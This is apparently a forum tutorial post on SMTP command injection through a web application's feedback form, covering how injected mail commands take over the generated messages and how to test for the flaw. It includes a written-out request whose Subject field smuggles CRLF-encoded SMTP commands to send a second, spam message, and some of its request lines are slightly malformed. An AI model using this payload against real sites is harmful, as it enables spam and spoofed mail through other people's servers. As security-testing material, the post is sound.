Uh oh. Looks like your using an ad blocker.
Our site is support by ads that help to pay our hosting costs. Please disable or whitelist us within your ad blocker to help us keep the site online.
All money generate by ads and donations is used to pay the hosting costs of the site, for more information about our income and expenses please see our donation page.
I haven't done anything in a while, and I didn't find this here, so I figured I'd write an article on it. Here you go.
There are cases where an application may preform the SMTP conversation itself, or may pass user supplied input to a different component in order to do this. In this situation, it may be possible to inject arbitrary SMTP commands directly into this conversation, potentially taking full control of the messages being generated by the application.
For example, consider an application that uses requests of the following form to submit site feedback:
Post feedback.php HTTP/1.1 Host site.com CONTENT-LENGTH: 56
This causes the web application to preform an SMTP conversation with the following commands:
NOTE: After the SMTP client issues the DATA command, it sends the contents of the email message comprising of the message headers and body, and then sends a single dot character on its own line. This tells the server that the message is complete, and the client can then issue further SMTP commands to send further messages.
In this situation, you may be able to inject arbitrary SMTP commands into any of the email fields that you control. For example, you can attempt to inject into the Subject field as follows:
Post feedback.php HTTP/1.1 Host site.com CONTENT-LENGTH: 240
Fromemail@example.com&Subject=Site+feeback%0d%0ahello%0d%0a%2e%0d%0aMail+FROM:+firstname.lastname@example.org%0d%0aRSPT +TO:+email@example.com%0d%0aDATA%0d%0aFROM:+firstname.lastname@example.org%0d%0aTOemail@example.com%0d%0aSubject:+Cheap+viagra%0d%0aBlah%0d%0a%2e%0d%0amessage=foo If the application is vulnerable, then this will result in the following SMTP conversation, which give two different email messages, with the second being entirely within you control:
MAIL FROM: firstname.lastname@example.org RCPT TO: email@example.com DATA From: firstname.lastname@example.org To: email@example.com Subject: site feedback hello . MAIL FROM: firstname.lastname@example.org RCPT TO: email@example.com DATA From: firstname.lastname@example.org To: email@example.com Subject: Cheap Viagra Blah . foo .
Finding SMTP injection flaws:
To probe an application's mail functionality effectively, you need to target every parameter that is submitted to an email-related function, even those that may initially appear to be unrelated to the content of the generated message.
You should also test for each kind of attack, and you should preform each test case using both windows and unix-style newline characters.
I hope you liked it, I'm working on more as we speak.